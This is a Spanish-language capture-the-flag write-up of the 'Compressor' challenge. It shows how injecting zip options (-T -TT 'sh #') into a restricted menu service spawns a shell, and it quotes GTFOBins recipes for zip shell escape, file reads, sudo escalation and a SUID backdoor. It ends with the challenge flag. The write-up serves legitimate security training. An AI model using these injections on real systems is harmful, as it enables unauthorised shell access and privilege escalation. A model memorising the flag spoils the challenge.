Compressor
3 minutos de lectura
Para este reto solamente tenemos una instancia remota a la que conectarnos:
$ nc 157.245.33.77 31001
[*] Directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv
Component List:
+===============+
| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |
+===============+
[*] Choose component:
Podemos elegir el primero, por ejemplo:
[*] Choose component: 1
[*] Sub-directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv/Head
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
Perfecto, tenemos algunas opciones con las que trabajar.
Vemos que podemos utilizar zip como comando e indicar opciones. Si miramos en GFTObins, descubrimos que existe una manera de conseguir una shell con un parámetro específico.
También se puede hacer uso de mi herramienta gtfobins-cli para ver esta misma información desde la interfaz de línea de comandos:
$ gtfobins-cli zip
zip ==> https://gtfobins.github.io/gtfobins/zip/
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TF
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Limited SUID
If the binary has the SUID bit set, it may be abused to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run commands (e.g., via system()-like invocations) it only works on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
sudo install -m =xs $(which zip) .
TF=$(mktemp -u)
./zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Genial, entonces podemos usar -T -TT 'sh #' como opción para obtener una shell. Pero primero tenemos que crear un artefacto, porque no tenemos nada en el directorio de trabajo actual:
[*] Choose action: 2
/home/ctf/Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm/Head
total 8
drwxr-sr-x 2 ctf ctf 4096 May 19 00:45 .
drwxr-sr-x 6 ctf ctf 4096 May 19 00:45 ..
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action: 1
Insert name: asdf
Insert content: asdf
[+] Artifact [asdf] was created successfuly!
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
Y ahora podemos usar el GTFOBin para obtener una shell y conseguir la flag:
[*] Choose action: 4
Insert <name>.zip: asdf
Insert <name>: asdf
Insert <options>: -T -TT 'sh #'
adding: asdf (stored 0%)
whoami
ctf
cd ..
ls
Hands
Head
Legs
Torso
cd ..
ls
Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm
artifacts.py
clear.py
flag.txt
cat flag.txt
HTB{z1pp1ti_z0pp1t1_GTFO_0f_my_pr0p3rty}